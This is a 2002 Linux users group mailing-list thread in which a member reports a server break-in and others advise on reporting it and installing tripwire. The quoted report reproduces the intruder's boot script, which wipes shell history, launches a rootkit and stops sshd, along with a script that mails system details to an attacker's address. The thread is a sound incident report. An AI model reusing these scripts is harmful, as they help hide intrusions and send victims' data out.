[lug] i got hacked
Harris, James
James_Harris at maxtor.com
Fri Apr 19 09:27:27 MDT 2002
One final piece of advise when you rebuild, install tripwire. All of the
firewall recommendations, combined with wrappers, log sentry (log check)
will help prevent it from happening again, but tripwire will let you know if
it _does_ happen again.
Just another layer of paranoia.
-----Original Message-----
From: D. Stimits [mailto:stimits at idcomm.com]
Sent: Thursday, April 18, 2002 18:38
To: lug at lug.boulder.co.us
Subject: Re: [lug] i got hacked
j davis wrote:
>
> yahoo,
> i got hacked and there sending info to a yahoo
> account.....ryz_ro at yahoo.com look below....
Hope you actually sent it to abuse at yahoo.com, this one went to BLUG. Do be
certain to mention it was a criminal breakin, and that logs and data should
be preserved for police inquiries.
D. Stimits, stimits at idcomm.com
>
> >From: "j davis" <davis_compz at hotmail.com>
> >Reply-To: lug at lug.boulder.co.us
> >To: lug at lug.boulder.co.us
> >Subject: [lug] i got hacked
> >Date: Thu, 18 Apr 2002 21:44:09 +0000
> >
> >
> >i have a box at a place i do contract work about 2 days a month.
> >today i could not ssh to it. so iwent on site and discoverd i got
> >hacked...like a dummy i didnt have tcp wrappers on or a firewall . i
> >think they exploited wu-ftpd ..i use redhat 7.1 with wu-ftpd
> >2.6.1-20...i havent got around to upgrading yet.
> >anyway here is what i found in /etc/rc3.d/S52remote
> >
> >#!/bin/sh
> >
> >rm -rf /root/.bash_history
> >ln -s /dev/null /root/.bash_history
> >
> >cd /dev
> >./ryz -f ./s
> >/etc/rc.d/init.d/sshd stop
> >cd /
> >
> >/usr/bin/trimite
> >
> >then here is /usr/bin/trimite
> >
> >#!/bin/sh
> >
> >echo "* Info : $(uname -a)" >> /tmp/info
> >echo "* Hostname : $(hostname -f)" >> /tmp/info
> >echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> /tmp/info echo
> >"* Uptime : $(uptime)" >> /tmp/info echo "* Cpu Vendor ID : $(cat
> >/proc/cpuinfo|grep vendor_id)" >> /tmp/info echo "* Cpu Model : $(cat
> >/proc/cpuinfo|grep model)" >> /tmp/info echo "* Cpu Speed: $(cat
> >/proc/cpuinfo|grep MHz)" >> /tmp/info echo "* Bogomips: $(cat
> >/proc/cpuinfo|grep bogomips)" >> /tmp/info echo "* Spatiu Liber: $(df
> >-h)" >> /tmp/info echo "* Ping la Yahoo: $(ping -c3 yahoo.com)" >>
> >/tmp/info echo "* Password: $(wc /etc/passwd -l)" >> /tmp/info
> >echo "* Portul rootkitului este 25897" >> /tmp/info
> >cat /tmp/info | mail -s "root dupa reboot" ryz_ro at yahoo.com
> >rm -f /tmp/info
> >
> >so, netstat says i have something listening on 25897...what should i
> >do?! never benn hacked before....i already turned off ftp and turned
> >on tcp wrappers.
> >
> >help please
> >jd
_______________________________________________
Web Page: http://lug.boulder.co.us
Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug
More information about the LUG
mailing list